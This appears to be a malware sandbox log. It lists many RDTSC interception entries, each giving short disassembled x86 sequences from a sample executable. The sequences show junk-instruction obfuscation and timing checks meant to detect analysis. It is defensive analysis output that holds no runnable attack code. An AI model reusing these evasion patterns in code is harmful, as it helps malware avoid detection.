Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 545024D second address: 545028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 call 00007F6BF4F65168h 0x0000000a push esi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d popad 0x0000000e and dword ptr [eax+04h], 00000000h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F6BF4F65166h 0x0000001a pop eax 0x0000001b mov ch, bl 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 545028F second address: 5450295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5450295 second address: 5450299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 543059A second address: 54305A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54305A0 second address: 54305A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54305A4 second address: 54305B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440CA1 second address: 5440CB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440CB0 second address: 5440D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6BF4B2C35Fh 0x00000009 sbb ecx, 25302EAEh 0x0000000f jmp 00007F6BF4B2C369h 0x00000014 popfd 0x00000015 mov dl, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov esi, 39CEE62Fh 0x00000021 pushfd 0x00000022 jmp 00007F6BF4B2C364h 0x00000027 add ax, 6B58h 0x0000002c jmp 00007F6BF4B2C35Bh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6BF4B2C365h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440D2E second address: 5440D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, 2FC2DD39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440D4D second address: 5440D60 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 5B6B13F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, FAh 0x0000000b popad 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440D60 second address: 5440D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5440D64 second address: 5440D6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5450019 second address: 5450029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F6515Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5450029 second address: 545002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 545002D second address: 5450056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F6BF4F65169h 0x00000011 mov di, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470754 second address: 54707B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007F6BF4B2C35Eh 0x00000011 mov eax, dword ptr [76FA65FCh] 0x00000016 jmp 00007F6BF4B2C360h 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e mov cl, ACh 0x00000020 mov di, D8BEh 0x00000024 popad 0x00000025 je 00007F6C665DF523h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F6BF4B2C360h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54707B1 second address: 5470873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F6BF4F65166h 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 jmp 00007F6BF4F65161h 0x00000018 and ecx, 1Fh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6BF4F6515Ch 0x00000022 and cx, E348h 0x00000027 jmp 00007F6BF4F6515Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F6BF4F65168h 0x00000033 jmp 00007F6BF4F65165h 0x00000038 popfd 0x00000039 popad 0x0000003a ror eax, cl 0x0000003c pushad 0x0000003d push ecx 0x0000003e push ebx 0x0000003f pop esi 0x00000040 pop edx 0x00000041 pushfd 0x00000042 jmp 00007F6BF4F65164h 0x00000047 xor si, 9338h 0x0000004c jmp 00007F6BF4F6515Bh 0x00000051 popfd 0x00000052 popad 0x00000053 leave 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470873 second address: 5470879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470879 second address: 54708E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6BF4F6515Fh 0x00000009 jmp 00007F6BF4F65163h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 retn 0004h 0x00000015 nop 0x00000016 mov esi, eax 0x00000018 lea eax, dword ptr [ebp-08h] 0x0000001b xor esi, dword ptr [00282014h] 0x00000021 push eax 0x00000022 push eax 0x00000023 push eax 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 call 00007F6BFA19593Ch 0x0000002d push FFFFFFFEh 0x0000002f pushad 0x00000030 mov ebx, ecx 0x00000032 pushfd 0x00000033 jmp 00007F6BF4F65160h 0x00000038 sub cx, 8F28h 0x0000003d jmp 00007F6BF4F6515Bh 0x00000042 popfd 0x00000043 popad 0x00000044 pop eax 0x00000045 pushad 0x00000046 mov ecx, 24B6AB3Bh 0x0000004b mov bx, si 0x0000004e popad 0x0000004f ret 0x00000050 nop 0x00000051 push eax 0x00000052 call 00007F6BFA195969h 0x00000057 mov edi, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54708E2 second address: 54708E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54708E6 second address: 54708EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54708EC second address: 547094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F6BF4B2C35Eh 0x00000010 pushfd 0x00000011 jmp 00007F6BF4B2C362h 0x00000016 sub si, D718h 0x0000001b jmp 00007F6BF4B2C35Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6BF4B2C364h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 547094A second address: 5470950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5470950 second address: 54709C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6BF4B2C35Fh 0x00000010 and ax, B93Eh 0x00000015 jmp 00007F6BF4B2C369h 0x0000001a popfd 0x0000001b mov eax, 7BA2B487h 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 call 00007F6BF4B2C368h 0x00000029 mov dx, cx 0x0000002c pop esi 0x0000002d mov ecx, edi 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F6BF4B2C364h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54709C8 second address: 54709CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420007 second address: 542003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 3E846D20h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007F6BF4B2C364h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F6BF4B2C35Dh 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 542003C second address: 5420041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420041 second address: 5420048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420048 second address: 5420056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420056 second address: 5420068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4B2C35Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420068 second address: 54200A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d jmp 00007F6BF4F65169h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 jmp 00007F6BF4F6515Ch 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54200A4 second address: 54200AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54200AA second address: 54200F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F6BF4F65160h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F6BF4F6515Dh 0x00000018 pop ecx 0x00000019 call 00007F6BF4F65161h 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54200F6 second address: 5420119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4B2C35Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420119 second address: 54201E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6BF4F65161h 0x00000009 add eax, 75A901C6h 0x0000000f jmp 00007F6BF4F65161h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a jmp 00007F6BF4F65163h 0x0000001f mov edi, eax 0x00000021 popad 0x00000022 mov ebx, dword ptr [ebp+10h] 0x00000025 pushad 0x00000026 call 00007F6BF4F65160h 0x0000002b pushfd 0x0000002c jmp 00007F6BF4F65162h 0x00000031 sbb ecx, 2D5977F8h 0x00000037 jmp 00007F6BF4F6515Bh 0x0000003c popfd 0x0000003d pop ecx 0x0000003e call 00007F6BF4F65169h 0x00000043 mov bh, ch 0x00000045 pop ebx 0x00000046 popad 0x00000047 xchg eax, esi 0x00000048 jmp 00007F6BF4F65168h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6BF4F6515Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54201E2 second address: 542026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push esi 0x0000000c mov bh, FFh 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 push eax 0x00000015 pushfd 0x00000016 jmp 00007F6BF4B2C35Bh 0x0000001b sub cx, 33DEh 0x00000020 jmp 00007F6BF4B2C369h 0x00000025 popfd 0x00000026 pop ecx 0x00000027 mov cl, dh 0x00000029 popad 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c mov ecx, 14BCE8B5h 0x00000031 pushad 0x00000032 call 00007F6BF4B2C360h 0x00000037 pop ecx 0x00000038 mov ecx, edi 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 call 00007F6BF4B2C369h 0x00000045 pop esi 0x00000046 movsx edi, cx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 542026B second address: 5420285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F65166h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420285 second address: 5420297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, si 0x0000000f push esi 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420297 second address: 54202D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F6BF4F6515Eh 0x00000010 je 00007F6C66A634AFh 0x00000016 pushad 0x00000017 push ecx 0x00000018 push edx 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54202D5 second address: 54202D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54202D9 second address: 54202DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54202DD second address: 54202E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54202E3 second address: 54202E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54202E9 second address: 542030F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6C6662A690h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6BF4B2C364h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 542030F second address: 5420315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420315 second address: 5420326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420326 second address: 5420374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [esi+44h] 0x0000000e pushad 0x0000000f mov esi, 4A9DB153h 0x00000014 mov ecx, 57C80FAFh 0x00000019 popad 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e jmp 00007F6BF4F65167h 0x00000023 popad 0x00000024 test edx, 61000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420374 second address: 542037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 542037A second address: 5420380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420380 second address: 5420384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420384 second address: 54203BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F6C66A63440h 0x00000011 jmp 00007F6BF4F65160h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54203BE second address: 54203C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54203C2 second address: 54203DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410738 second address: 5410749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410749 second address: 541077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6BF4F65168h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 541077B second address: 5410781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410781 second address: 54107C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d jmp 00007F6BF4F6515Dh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushad 0x00000016 call 00007F6BF4F6515Ah 0x0000001b pop ecx 0x0000001c mov dx, E9B6h 0x00000020 popad 0x00000021 push ebx 0x00000022 mov ebx, eax 0x00000024 pop eax 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54107C5 second address: 54107C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54107C9 second address: 54107CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54107CF second address: 541082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F6BF4B2C35Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 mov dh, 64h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F6BF4B2C365h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F6BF4B2C35Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 541082B second address: 5410831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410831 second address: 5410835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410835 second address: 5410839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410839 second address: 541084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6BF4B2C35Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 541084F second address: 5410898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F6BF4F6515Eh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 jmp 00007F6BF4F65160h 0x00000019 sub ebx, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410898 second address: 5410949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F6BF4B2C360h 0x00000010 je 00007F6C66631E22h 0x00000016 jmp 00007F6BF4B2C360h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 pushad 0x00000024 movzx eax, bx 0x00000027 pushfd 0x00000028 jmp 00007F6BF4B2C369h 0x0000002d jmp 00007F6BF4B2C35Bh 0x00000032 popfd 0x00000033 popad 0x00000034 call 00007F6BF4B2C368h 0x00000039 call 00007F6BF4B2C362h 0x0000003e pop ecx 0x0000003f pop ebx 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F6BF4B2C35Dh 0x0000004a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410949 second address: 541094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 541094F second address: 5410967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6C66631DA2h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov edi, 7F0BC386h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
